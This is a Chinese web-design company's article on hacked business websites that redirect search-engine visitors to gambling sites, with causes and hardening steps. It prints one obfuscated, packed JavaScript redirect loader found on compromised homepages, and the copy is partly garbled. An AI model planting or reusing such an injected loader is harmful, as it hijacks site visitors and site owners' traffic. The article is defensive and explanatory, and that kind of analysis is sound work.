2021-10-03 分類: 網(wǎng)站建設(shè)
最近公司內(nèi)部跟單同事表示,大批深圳網(wǎng)站制作公司客戶在做百度推廣時候,網(wǎng)站的首頁點擊進去后自動跳轉(zhuǎn)到彩票網(wǎng)站、bocai網(wǎng)站,這樣用戶從百度搜索或者從推廣廣告位進去網(wǎng)站后發(fā)生跳轉(zhuǎn),而直接輸入網(wǎng)址是沒有任何跳轉(zhuǎn)的,這樣一來用戶流失造成訪問量急劇下滑、網(wǎng)站服務(wù)器資源浪費、推廣費用浪費等,甚至可以說做了百度推廣、搜狗推廣的都在給彩票公司做廣告了,在網(wǎng)站制作行業(yè)內(nèi)引起軒然大波。
有不少客戶在反應(yīng)這個問題時候,找到廣告商賠償甚至追究責任,所以在網(wǎng)站惡意跳轉(zhuǎn)的問題上我們運營人員需要重視并且知曉如何快速解決,深圳網(wǎng)站制作公司創(chuàng)新互聯(lián)從網(wǎng)絡(luò)上查閱并且測試后總結(jié)為以下經(jīng)驗:
一、分析網(wǎng)站被黑跳轉(zhuǎn)bocai網(wǎng)站原因
一般情況下網(wǎng)站被黑時候后都是因為服務(wù)器信息(服務(wù)器IP遠程端口管理員賬號密碼、SSH端口、root賬號密碼)和網(wǎng)站信息包括FTP賬號密碼的對接被黑客知曉,進而造成黑客植入木馬或者后門。
整體的安全監(jiān)測中,asp網(wǎng)站和php網(wǎng)站都存在著木馬,這也就意味著木馬能夠以php腳本木馬、asp腳本木馬、jsp腳本木馬而存在,這些木馬后門可以對網(wǎng)站進行惡意篡改,上傳,改名,下載,等管理員的高權(quán)限操作。出現(xiàn)網(wǎng)站被跳轉(zhuǎn)的客戶,采用的網(wǎng)站架構(gòu)都是php+mysql架構(gòu),以及jsp+mysql架構(gòu),大多數(shù)用的是開源程序,像dedecms,織夢系統(tǒng),phpcms系統(tǒng),discuz系統(tǒng)。
當我們懂得一些代碼的時候,必然會看到網(wǎng)站首頁中會有一些惡意篡改代碼,通過刪除惡意代碼后可能會在幾天內(nèi)完全的停止跳轉(zhuǎn)的,但是在一段時間后卻又會被跳轉(zhuǎn),這個是很令人懊惱的治標不治本措施。過了不久后網(wǎng)站又會出現(xiàn)跳轉(zhuǎn),那么針對于網(wǎng)站漏洞問題是很難甚至是不能夠完全清除的。
通過觀察部分客戶網(wǎng)站首頁,其首頁代碼中都會有一段加密代碼,這段代碼是根據(jù)搜索引擎的特征來跳轉(zhuǎn),比如通過百度搜索,360搜索,搜狗搜索來的會直接跳轉(zhuǎn)到賭博網(wǎng)站上去。如下代碼:
type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retund[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newRegExp('\\b'+e(c)+'\\b','g'),k[c]);returnp;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))
一旦被攻擊之后,百度搜索引擎就會判斷出網(wǎng)站是否被攻擊,從而在百度風(fēng)險評估中心就會對網(wǎng)站進行記錄以及標識,百度網(wǎng)址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改!紅色提示該百度風(fēng)險。導(dǎo)致客戶打開網(wǎng)站直接被百度攔截,如下圖所示:
針對于以上跳轉(zhuǎn)攻擊的特征,我們深圳網(wǎng)站制作公司一致認為應(yīng)該從人工代碼方面進行審計,以及檢測網(wǎng)站漏洞、網(wǎng)站后門木馬清理、漏洞修復(fù)以及xss獲取管理員賬號cookies漏洞,discuz存在getshell漏洞,注入獲取管理員漏洞,discuz上傳繞過漏洞等。
二、修復(fù)以及防止網(wǎng)站被惡意跳轉(zhuǎn)的辦法
1、對服務(wù)器目錄進行安全部署、對管理員帳號密碼加密、對所有密碼進行數(shù)字+大小寫字母+特殊符號要求、對網(wǎng)站數(shù)據(jù)庫進行分配普通權(quán)限賬號。
2、mysql數(shù)據(jù)庫默認端口3306,改為61116,并加入到端口安全策略,不對外開放,外網(wǎng)IP無法連接數(shù)據(jù)庫,只有本地127.0.0.1才能進行連接數(shù)據(jù)庫,以防止攻擊者惡意猜測。
3、對服務(wù)器底層系統(tǒng)進行安全加固,包括遠程端口登錄的安全驗證。
4、對網(wǎng)站代碼進行整體的安全檢測,包括定期的升級網(wǎng)站程序源代碼,修復(fù)補丁以及網(wǎng)站漏洞。
深圳網(wǎng)站制作公司處理網(wǎng)站跳轉(zhuǎn)問題有很多方法,以上內(nèi)容只是解決問題的方法之一,那么作為一個網(wǎng)站制作公司應(yīng)該對源碼進行優(yōu)化和調(diào)整,這樣才能確保后期的網(wǎng)站不會受到影響,這就涉及到網(wǎng)站源碼升級以及版本升級問題。
分享名稱:企業(yè)網(wǎng)站惡意跳轉(zhuǎn)賭博網(wǎng)站如何處理
瀏覽路徑:http://www.rwnh.cn/news/129480.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供定制開發(fā)、網(wǎng)站收錄、企業(yè)建站、虛擬主機、微信小程序、全網(wǎng)營銷推廣
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容